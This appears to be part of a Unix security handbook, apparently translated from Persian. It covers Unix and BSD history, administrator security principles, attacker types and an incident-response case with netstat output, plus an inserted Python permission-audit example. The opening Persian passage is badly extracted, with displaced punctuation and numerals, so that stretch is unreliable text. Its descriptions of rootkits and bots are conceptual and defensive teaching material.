Unixﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻲﻃﻠﺒﻴﺪ ،ﭼﻮﻥ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﺎﻭﺭ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﭘﺸﺘﻴﺒﺎﻧ ﹺ
ﻲ ﺑﺴﺘﺮﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺭﺍ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺳﺎﺩﻩﺗـﺮ ﻣـﻲﻛﻨـﺪ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺑﺎﺯﺍﺭ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﻗﺎﺑﺖ ﻣﻲﻧﻤﺎﻳﺪ.
ﺩﺭ ﻣﺎﻩ ﻣﻲ ،۱۹۸۸ﻫﻔﺖ ﺷﺮﻛﺖ ﭘﻴﺸﺮﻭ ﺩﺭ ﺻﻨﻌﺖ - Unixﺭﺍﻳﺎﻧﻪ ﺁﭘﻮﻟﻮ ،١١ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ،١٢ﻫﻴﻮﻟﺖ ﭘﺎﻛﺎﺭﺩ )،IBM ،١٣(HP
١٤
ﻭ ﺳﻪ ﺷﺮﻛﺖ ﺍﺻﻠﻲ ﺍﺭﻭﭘﺎﻳﻲ ﺳﺎﺯﻧﺪﻩ ﻛﺎﻣﭙﻴﻮﺗﺮ -ﺗﺸﻜﻴﻞ ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯ ) (OSFﺭﺍ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ .ﻫﺪﻑ OSFﺑﻴـﺮﻭﻥ ﺁﻭﺭﺩﻥ Unix
ﺍﺯ ﻛﻨﺘﺮﻝ AT&Tﻭ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ ﺩﺳﺘﺎﻥ ﻳﻚ ﺍﺋﺘﻼﻑ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺻﻨﻌﺘﻲ ﺑﻮﺩ ،ﻛﻪ ﺑﺎ ﻫﺪﺍﻳﺖ ﺗﻮﺳﻌﺔ Unixﺩﺭ ﺁﻳﻨـﺪﻩ ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﻋﻤﻮﻡ -ﺗﺤﺖ ﻳﻚ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺍﺣـﺪ -ﺭﻫﺒـﺮﻱ ﻣـﻲﺷـﺪ OSF .ﺗـﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﺎﻳـﺔ Unixﺧـﻮﺩ ﺭﺍ ﺑﺮﺍﺳـﺎﺱ
١٦ ١٥
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ IBMﻗﺮﺍﺭ ﺩﻫﺪ ،ﭘﺲ ﺑﻪ ﺳﻤﺖ ﻫﺴﺘﺔ Unixﻣﺎﺥ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﺭﻧﻲ ﻣﻠﻮﻥ ،ﻛﻪ ﺁﻣﻴﺰﻩﺍﻱ ﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﻭ ﺗﺴﻬﻴﻼﺕ HP
ﻭ IBMﻭ ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺩ ﺣﺮﻛﺖ ﻛﺮﺩ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻮﺭﺩ ﭘﺬﻳﺮﺵ ﻭ ﺍﺳﺘﻘﺒﺎﻝ ﮔﺴﺘﺮﺩﻩ ﻭﺍﻗـﻊ ﻧـﺸﺪ،
OSFﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﻴﺸﺘﺮ ﺗﻮﺳﻌﻪﺍﻱ ﺍﺩﺍﻣﻪ ﺩﺍﺩ.
GNU
ﺭﻳﭽﺎﺭﺩ ﺍﺳﺘﺎﻟﻤﻦ ١٧ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﭘﺮﻭﮊﻩ LISPﺩﺭ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﻫﻮﺵ ﻣﺼﻨﻮﻋﻲ ﺩﺍﻧﺸﮕﺎﻩ ﻭﻗﺘـﻲ ﺩﻳـﺪ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﺭﺳﺎﻧﺪﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺄﺳﻴﺲ ﺷﺪﻩﺑﻮﺩﻧﺪ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﭘﺬﻳﺮﻓﺘﻨﺪ ﻛﻪ ﻣﺎﻧﻊ ﺑﻪ ﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻮﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺭﺍﺣـﺖ ﺷـﺪ .ﺍﺳـﺘﺎﻟﻤﻦ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﺘﻮﺟﻪ ﺷﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨﻮﺍﻫﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﻣﻴﺎﻥ ﮔﺮﻭﻩ ﺑﺰﺭﮔﻲ ﺍﺯ ﻣﺮﺩﻡ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﺩ ،ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺳـﺎﺱ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮ ﺳـﺨﺖﺍﻓـﺰﺍﺭ
ﺧﺎﺻﻲ ﻛﻪ ﺗﻨﻬﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺧﺎﻧﻪﻫﺎﻱ ﺳﺎﺯﻧﺪﻩ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻭ ﺗﻨﻬﺎ LIPSﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﭘﺎﻳﻪﮔـﺬﺍﺭﻱ ﻛﻨـﺪ .ﻟـﺬﺍ ﺑـﻪ
ﺟﺎﻱ ﺍﻳﻨﻜﺎﺭ ﺍﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺍﻧﺠﻤﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ،Unixﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻗﺪﺭﺗﻤﻨﺪ ﻛﻪ ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻢ ﻗﺒﻠـﻲ ﻭ ﻧﻴـﺰ
ﺁﻳﻨﺪﻩﺩﺍﺭ ﺑﻮﺩ ﭘﺎﻳﻪﺭﻳﺰﻱ ﻛﻨﺪ .ﺍﻭ ﻃﺮﺡ ﺧﻮﺩ ﺭﺍ GNUﻧﺎﻣﻴﺪ؛ ﻳﻚ ﻣﺨﻔﻒ ﺑﺎﺯﮔﺸﺘﻲ ﺍﺯ ﻋﺒﺎﺭﺕ " Unix GNUﻧﻴـﺴﺖ"! ١٨ﺍﺯ ﻧﻈـﺮ ﺍﺳـﺘﺎﻟﻤﻦ
ﺭﺍﻳﮕﺎﻥ ﺑﻮﺩﻥ ﺗﻨﻬﺎ ﻣﻌﻴﺎﺭ ﻫﺰﻳﻨﻪ ﻧﺒﻮﺩ ،ﺑﻠﻜﻪ ﻳﻚ ﻣﻌﻴﺎﺭ ﺁﺯﺍﺩﻱ ﻫﻢ ﺑﻮﺩ .ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺑﻪ ﺍﻳﻦ ﻣﻔﻬﻮﻡ ﺑﻮﺩ ﻛﻪ ﺍﻭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺖ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ
ﺑﺎﺯﺑﻴﻨﻲ ﻛﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﻧﻤﺎﻳﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﺯﺍﺩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻴﺎﻥ ﺩﻭﺳﺘﺎﻧﺶ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ.
ﺍﻭ ﺁﺯﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺁﻧﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﺑﻴﺎﻥ ﻣﻄﺮﺡ ﺍﺳﺖ ،ﻧﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﻣﺸﺮﻭﺑﺎﺕ ﺍﻟﻜﻠﻲ .ﺗﺎ ﺳـﺎﻝ ۱۹۸۵ﺍﻭﻟـﻴﻦ ﻣﺤـﺼﻮﻝ
ﻋﻤﺪﺓ - GNUﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ - Emacsﺑﻪ ﻧﻘﻄﻪﺍﻱ ﺍﺯ ﺭﺷﺪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺍﺳـﺘﺎﻟﻤﻦ ﻫـﻢ ﺑـﻪ
ﺭﺍﺣﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ .ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﺎﻟﻤﻦ ﻛﺎﺭ ﺭﻭﻱ ﻳﻚ ﻛﺎﻣﭙﺎﻳﻠﺮ ﺁﺯﺍﺩ Cﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ؛ .GNU Cﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ
ﻋﻤﻮﻣﻲ ١٩(GPL) GNUﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﺷﺪﻧﺪ .ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ،ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺣﻖ ﺍﻧﺘﺸﺎﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﺷﺨﺼﻲ ﺭﺍ
ﻣﻲﺩﺍﺩ ،ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻫﻤﺔ ﺗﻐﻴﻴﺮﺍﺕ ﺁﺗﻲ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ،ﺗﺤﺖ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻫﻤﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻗﺒﻠﻲ ﻣﻨﺘﺸﺮ ﺷـﻮﻧﺪ .ﻫﻤـﺎﻥ ﺳـﺎﻝ ﺍﺳـﺘﺎﻟﻤﻦ
ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ٢٠ﺭﺍ ﺗﺄﺳﻴﺲ ﻛﺮﺩ؛ ﺑﻨﻴﺎﺩﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻛﻪ ﻫﺪﺍﻳﺎﻱ ﻣﺮﺩﻣﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﺮﺩ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﺑﺮﻧﺎﻣﻪﻧﻮﻳـﺴﺎﻧﻲ ﻛـﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺍﻧﺘﺸﺎﺭ ﻣﺠﺪﺩ ﻣﻲﻧﻮﺷﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ.
Unix and Minix
At about the same time that Stallman started the GNU project, Professor Andrew S. Tanenbaum [21] decided to create his own implementation of the Unix operating system for use in teaching and research. Because all of the code was written from scratch, he could freely publish the source code in his textbook and distribute a working operating system without paying royalties to AT&T. This system, Minix, ran on IBM PC AT compatible personal computers equipped with Intel-based processors. The project produced a stable, well-documented software platform and an excellent operating system textbook. However, efficiency was not a primary criterion in the design of Minix, and this, together with the copyright issues tied to the textbook, meant that Minix did not turn out to be a good choice for widespread everyday use.
In 1991 a Finnish computer science student named Linus Torvalds [22] decided to create a free version of the Unix operating system that would be better suited to everyday use. Starting from the Minix code, Torvalds reimplemented the kernel and the filesystem step by step until he had a new system that contained none of Tanenbaum's original code. Torvalds named the resulting system "Linux" and decided to distribute it under Stallman's GPL. By combining his system with other freely available tools, in particular the Free Software Foundation's GNU C compiler and text editor and the X Consortium's window server, Torvalds was able to create a complete, working operating system. Work on Linux continues to this day, carried on by hundreds of contributors.
... remaining in the kernel, which contained AT&T code and had therefore not been included in the operating system. In the fall of 1991 Bill Jolitz [25] wrote these files for the Intel processor and created a working operating system named 386/BSD.
Within a few months a group of volunteers took on the task of maintaining and extending the resulting system, and their effort was named NetBSD. The NetBSD project soon splintered. Some members believed that the project's primary goal should be broadened so that it could support as many different platforms as possible and continue operating system research, while another group of developers believed that they should devote their resources, as far as possible, to making programs run better on the Intel/386 platform and to making the system easier to use. The second group split from the first and started the FreeBSD project. A few years later another splinter group broke away from the NetBSD project. This group believed that security and reliability were not receiving the attention they deserved. Its emphasis was on careful review of the source code to identify potential problems. They restricted the adoption of new code and drivers until these had been thoroughly vetted for quality. This third group was named OpenBSD.
... This approach, although not applicable to every problem, often gave better results than using individual supercomputers, and at far lower cost. One of the first working systems of this kind, named Beowulf, was based on Linux. Because this code was shared and developed on all fronts by the supercomputing community, Linux spread quickly among other groups around the world who wanted to do similar work.
All of these interests, combined with the growing problems of Microsoft's monopoly in the operating system market, caught the attention of two companies, IBM and Dell, both of which announced commercial support for Linux. Around the same time, two companies devoted solely to the Linux operating system, Red Hat and VA Linux, had two of the most successful initial public offerings in the history of the U.S. stock market. Shortly afterwards HP announced that it would support a version of Linux on its systems.
Today many businesses and research laboratories run on Linux. They use Linux to run web servers and mail servers and, to a lesser extent, as a general desktop computing platform. Instead of buying supercomputers, businesses build large Linux clusters that can solve large computing problems through parallel execution. Similarly, FreeBSD, NetBSD and OpenBSD are well suited to these applications and are widely used. Nevertheless, anecdotal evidence suggests that Linux has seen greater user growth than any other system. Judging by the announced commercial support, including the ventures announced by Sun Microsystems, Linux appears to have better growth momentum in the market. Even so, if only because of security and performance issues, we do not expect the other BSD variants to fade away; although the BSD groups continue their separate existences, they do not appear likely to take any of Linux's market share.
There are several versions of the Linux and BSD operating systems that boot the system from a single floppy disk. These versions, which include Trinix, picoBSD and closedBSD, are designed for applications that require high security, including forensics, recovery and network appliances.
Security and Unix
Like systems based on Microsoft Windows NT, Unix is a multi-user [26] and multitasking [27] operating system. Multi-user means that the operating system allows different people to use the computer at the same time. Multitasking means that each user can run several programs simultaneously. One of the natural functions of such an operating system is to keep the different people (or programs) using the same system at the same time from interfering with one another. Without such protection, a wayward program could affect other programs or users, could accidentally delete files, or could disrupt the entire computer system. To prevent such disasters, some form of computer security has always had a place in the Unix design philosophy.
Unix security provides more than mere memory protection. Unix has a sophisticated security system that controls the ways in which users access files, modify system databases and use system resources. Unfortunately, these mechanisms do not help much when the system is misconfigured, is used carelessly, or contains buggy software. Nearly all of the security holes found in Unix over the years have stemmed from problems of this kind rather than from shortcomings in the system's internal design. Nearly all Unix vendors therefore believe that they can provide a reasonably secure operating system. We believe that Unix systems can be far more secure than other operating systems, but there are nevertheless factors that work against better security in this environment.
Expectations and Hopes
Many users have grown up expecting to see Unix configured in a particular way. Their experience with Unix in academic, hobbyist and research settings has always been that they had access to all directories and most commands on the system. Users may be accustomed to their files being world-readable by default. Users are also often accustomed to being able to build and install the software they want, which usually requires system-level access (the highest level of access).
Unfortunately, all of these expectations run contrary to good security practice. To have stronger security, managers and system administrators must at times restrict access to files and commands that users do not really need in order to do their jobs. On this basis, someone who needs email and a word processor for their work should not expect to be able to run network analyzers and the C compiler. Likewise, to increase security, users should not be able to install software that has not been tested and approved by a trained and authorized person.
Administrators can raise the level of security by applying some general security principles in moderation. For example, instead of removing all compilers and libraries from every machine, these tools can be protected so that only users who belong to a particular user group can access them. Users who need such access, and who can be trusted to take the necessary care, can be added to this group. Similar methods can be used for other classes of tools, such as network monitoring software or Usenet news programs. In addition, changing the traditional view of "data" on a system (from readable by default to unreadable by default) can be useful. For example, users' files and directories should be protected against read access by default rather than being readable by everyone. Setting file access controls correctly and using shadow password files [28] are two examples that show how this simple change in system configuration can improve security across all of Unix.
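One way to audit the defaults described above, as an added example that is not from the handbook: it reports home-directory entries that "other" can read and checks that a tool such as the C compiler is limited to a single group. The directory tree, file names and the stand-in `cc` file are constructed for the demonstration.

```python
import os
import stat
import tempfile


def world_readable(root):
    """Return every directory and file under root that 'other' may read."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # a symlink's own mode bits carry no meaning
            if mode & stat.S_IROTH:
                hits.append(path)
    return sorted(hits)


def tool_restricted(path, gid):
    """True when path belongs to group gid and 'other' has no access at all."""
    st = os.stat(path)
    return st.st_gid == gid and (st.st_mode & stat.S_IRWXO) == 0


def lock_down(paths):
    """Strip every 'other' permission bit, leaving owner and group untouched."""
    for path in paths:
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, mode & ~stat.S_IRWXO)


def demo():
    """Build a constructed tree, audit it, tighten it, and audit again."""
    with tempfile.TemporaryDirectory() as top:
        home = os.path.join(top, "home", "alice")   # constructed user
        os.makedirs(home)
        notes = os.path.join(home, "notes.txt")
        secret = os.path.join(home, "secret.txt")
        cc = os.path.join(top, "cc")                # stand-in for a compiler
        for path, mode in ((notes, 0o644), (secret, 0o600), (cc, 0o755)):
            with open(path, "w") as fh:
                fh.write("x\n")
            os.chmod(path, mode)
        os.chmod(home, 0o755)
        devel_gid = os.stat(cc).st_gid              # group allowed to compile

        before = [os.path.relpath(p, home) for p in world_readable(home)]
        cc_before = tool_restricted(cc, devel_gid)
        lock_down(world_readable(home) + [cc])
        after = world_readable(home)
        cc_after = tool_restricted(cc, devel_gid)
        return before, cc_before, after, cc_after


if __name__ == "__main__":
    print(demo())
```

On a real system the same two checks would be pointed at the actual home directories and compiler paths, with the group set to whichever group the site trusts to build software.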
The most critical aspect of improving Unix security is getting users to take part in meeting these expectations. Clearly, if users have been accustomed to the personal operating systems that preceded Microsoft Windows NT, this advice applies equally to improving the security of NT-based systems. The way to reach this goal is not by issuing directives but through education, awareness and motivation. Technical security measures are very important, but experience has shown again and again that people problems cannot be solved with technology-based solutions. Many users started using computers in an environment that was less threatening than the one they face today. Educating users about the dangers that exist, and about how much their cooperation can help to neutralize those dangers, increases the security of the system. By properly motivating users to take part in good security practice, you make them part of the security mechanism. Better education and motivation work well only when they are applied together. Education without motivation may mean that security measures are not applied in practice, and motivation without education may mean that gaps are left in the work that is done.
Part Five
Chapter Two
Security for Administrators
Overview
This chapter gives a working definition of security for administrators, discusses the design of secure systems, and explains who attacks computer systems. It lists some of the attackers' common tools and describes a case study of one attack.
Security and Administrators
As a technical administrator, you are responsible for ensuring that the systems you manage work the way they are supposed to work. Although there are many formal definitions of security, a useful working definition for administrators is: "A computer is secure if you can depend on it and its software to behave as you expect."
If the information you put into the computer today is still there in a few weeks, and remains unread by those who should not read it, then the computer is secure. In that sense, security is a critical responsibility in every one of an administrator's roles. Under this definition, natural disasters and buggy software are as much a threat to security as unauthorized users.
Least privilege
Every user and process should have the least access necessary. Least privilege limits the damage that can be done by malicious attackers and, likewise, by errors. Rather than being assigned to users by default, access rights should be granted only when they are explicitly required for the users' activities.
Economy of mechanism
The design of the system should be small and simple so that it can be verified and implemented correctly.
Complete mediation
Every access should be checked for proper authorization.
Open design
Security should not be built on the attacker's ignorance. This criterion rules out system backdoors [31] that give access to users who know about them.
Separation of privilege
Wherever possible, access to system resources should depend on more than one condition being satisfied.
Psychological acceptability
Security controls must be easy to use so that they are actually used and are not bypassed.
Unfortunately, designers never learn these criteria, or if they do learn them they forget them, take shortcuts, or conclude that these issues are not important enough to bother with. As a result there are many operating systems, algorithms, applications and software packages that are poorly designed yet widely used, and that claim to be part of a system's security infrastructure. Poor design leads to problems and unanticipated side effects that may cause accidental damage to systems or information, or may be deliberately exploited by an attacker.
31 Backdoor
32 Blackbox Testing
33 Microsoft Internet Information Server
34 Apache Web Server
... is recognized as among the most secure operating systems available today, largely because every line of its kernel [35] source code has also been audited for security by its developers. The kernels of other open source operating systems, including Linux, are not reviewed this rigorously and contain code from a large number of developers. It is difficult to know how much security review proprietary Unix operating systems such as Solaris receive.
Knowing the Attacker
Who breaks into the computers on a network using the most sophisticated kinds of attacks? It almost does not matter; that is, it is not important who the attackers may be, because the system must be protected against all of them.
Script Kiddies
As their name suggests, in many cases the attackers are children and teenagers, people who unfortunately have not yet developed the sense of responsibility and the judgment needed to keep their technical skills in check.
Young people who use sophisticated attack tools are called script kiddies. The term is derisive. The word "script" refers to the fact that, instead of creating their own attacks, these attackers use ready-made attack scripts that can be downloaded from the Internet. They are called "kiddies" because many of them have been under the legal age when arrested.
Script kiddies should be regarded as a serious threat and danger, for the same reason that a teenager with a gun should be feared. In many cases teenagers carrying handguns should be feared even more than adults, because a teenager about to pull the trigger is less likely to understand the consequences of the act and is therefore more likely to pull it.
The same holds for script kiddies. For example, in 2001 the website of Gibson Research Corporation [36] was the target of a distributed denial-of-service (DDoS) attack [37] that took it offline for more than 17 hours. The attack was carried out through more than 400 Windows-based computers on the Internet that had been compromised in order to mount an automated attack. When the matter became clear, Steve Gibson [38] was able to obtain a copy of the attack program, reverse engineer it and trace it back. In the end it emerged that the person who had attacked his website was a 13-year-old girl.
In another, similar case, when Canadian authorities arrested "Mafiaboy" on April 19, 2000 for his February 2000 attacks on Yahoo, E*TRADE, CNN and many other high-profile sites, which had caused 1.7 billion dollars in damage, they could not release the suspect's name to the public, because the 16-year-old boy was protected by Canada's law on the privacy of minors.
Script kiddies may lack the technical skill to write their own scripts and Trojan horses, but this does not cause them much difficulty. They have tools at their disposal and are inclined to use them; either they do not understand what damage they cause, or they do not care.
35 Kernel
36 Gibson Research Corporation
37 Distributed Denial of Service Attack
38 Steve Gibson
What does a script kiddie become when grown up? Nobody is sure yet; there are no reliable studies. Anecdotal reports say that many script kiddies go straight. Some lose interest in computers, some become system operators or network administrators, and some even go into the field of computer security (hiring such people to monitor networks is still a contentious topic in computer security circles), but it goes without saying that some of them continue their life of crime.
Industrial Spies
There appears to be a growing black market for information stolen from computer systems. Some individuals have tried to blackmail or extort money from the rightful owners of the information, for example by offering to fix a company's vulnerabilities in exchange for large sums. There have been several documented cases (and probably many unreported ones) in which criminals stole customers' credit card numbers from a company's server and threatened to publish the information unless the company paid them. There are also reports of attackers trying to sell the trade secrets of companies they had penetrated to those companies' competitors. Such transactions have been declared illegal in the United States and in many other countries, though not in all.
Organized Crime
Enormous amounts of valuable information and financial data are exchanged over the Internet every day. It would be naive to imagine that criminal elements are unaware of this, or are not interested in extending their activities to the networked world. Attacks such as fraud, information theft and money laundering conducted online have occurred, and the authorities believe that all of them fall under organized crime. Network communications have been used to expand and coordinate prostitution, gambling, trafficking in illegal substances, armed assault and other activities that usually come under organized crime. In addition, law enforcement agencies may be targeted by criminals who want to discover what the government knows about them or to discover the identities of informants and witnesses.
As the network has become global, threats have taken on a wider scope. Today Russian gangs, Sicilian mafiosi, the Japanese Yakuza, South American drug traffickers and Los Angeles street gangs are all only a few mouse clicks away from us on the global network. Many law enforcement officials are worried that the Internet will be a breeding ground for crime in the coming decade.
Rogue Employees
And finally, there are many skilled employees who have acted against their employers out of revenge, malice, or a wish to harass. In some cases, dismissed employees have planted Trojan horses in their employer's computers.
There are many reasons why compromised systems make excellent platforms for this kind of illegal activity. If a compromised system is connected to the Internet at high speed, it may be able to cause more damage and disruption than the other systems under the attacker's control. Compromised systems can also be used to make it harder for the authorities to trace the attacker's actions back to the real attacker. If an attacker hops through many computers in different jurisdictions (for example, from a Unix user account in France to a Windows-based proxy server in South Korea, and from a university computer center in Mexico to a backbone router [40] in New York), tracing the attacker back to the source may become effectively impossible.
Bots
Bots (short for robots) are small programs that are usually placed by an attacker on a number of computers scattered across the Internet. Bots are one of the primary tools for controlling and directing distributed denial-of-service attacks over Internet Relay Chat channels. Bots may be distributed by viruses or Trojan horses. These programs may lie dormant for days, weeks or months and then be activated. Bots can also be put to use for automated tasks.
Rootkits
A rootkit is a program, or a set of programs, that simultaneously gives the attacker superuser privileges on a computer, plants backdoors in it, and erases every trace of the attacker's presence. Rootkits were originally designed for Unix systems (the name comes from the root user account), but they have also been produced for Windows systems. A typical rootkit may make many attempts to obtain superuser privileges. Once superuser access has been obtained, the rootkit can modify the login program so that a backdoor is added to it. It then modifies the kernel so that any attempt to read the login program returns the original program instead of the modified one; commands may be modified so that network connections from the attacker's computer are not displayed; and finally the rootkit may delete the last five minutes of the log files from the computer's storage.
Worms [43]
Worms, which exploit vulnerabilities in network servers or in the networking components of operating systems, have become a common method for rapidly compromising large numbers of computers.
43 Worms
44 Patches
45 Process
46 Shell
4. Using the gcore command on Unix, make a copy of the intruder's processes.
5. Define a rule on the ISP's router to block packets sent from the intruder's ISP.
6. Terminate the intruder's processes completely with the kill -9 command.
7. Determine how the intruder got into the system and fix the hole that was exploited.
8. Notify law enforcement.
To trace the intruder, the ISP tried using the netstat command. Doing so produced new information. The intruder had not logged in with telnet or SSH; instead, there was an X11 connection from the web server (Apache.Vineyard.NET) to an X server running on the attacker's computer.
bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1137 SYN_RCVD
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1136 SYN_RCVD
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1135 SYN_RCVD
tcp 0 0 VINEYARD.NET.http DSY27.VINEYARD.N.1079 SYN_RCVD
tcp 0 2456 VINEYARD.NET.http nhv-ct4-09.ix.ne.1134 ESTABLISHED
tcp 0 2268 VINEYARD.NET.http DSY27.VINEYARD.N.1078 ESTABLISHED
tcp 0 2522 VINEYARD.NET.http 209.174.140.26.1205 ESTABLISHED
tcp 0 8192 VINEYARD.NET.http host-209-214-118.1785 ESTABLISHED
tcp 0 4916 VINEYARD.NET.http host-209-214-118.1784 ESTABLISHED
tcp 0 0 VINEYARD.NET.http host-209-214-118.1783 ESTABLISHED
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1163 FIN_WAIT_2
tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1135 ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.1135 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp 0 0 VINEYARD.NET.smtp 208.135.218.34.1479 ESTABLISHED
tcp 0 3157 VINEYARD.NET.pop ASY5.VINEYARD.NE.1027 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2050 ESTABLISHED
tcp 0 0 VINEYARD.NET.http host-209-214-118.1782 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http host-209-214-118.1781 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http host-209-214-118.1775 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http 56k-2234.hey.net.1099 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.https ESY8.VINEYARD.NE.1557 FIN_WAIT_2
tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1058 ESTABLISHED
